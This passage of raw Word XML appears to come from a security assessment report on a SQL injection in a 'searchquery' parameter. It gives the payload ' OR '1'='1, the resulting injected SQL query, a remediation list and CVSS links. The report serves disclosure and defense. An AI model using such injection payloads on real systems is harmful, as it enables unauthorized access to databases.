        <w:t xml:space="preserve">Submit payload: ’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe the raw SQL query displayed: SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE ’’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IN (itemnum,sdesc,ldesc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries (prepared statements) for all database queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement input validation and sanitization for the searchquery parameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the principle of least privilege to database accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable detailed error messages in production environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider using an ORM that handles parameterization automatically</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ww.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" TargetMode="External" /><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5" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" TargetMode="External" /><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2026-02-23T03:23:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-23T03:23:15Z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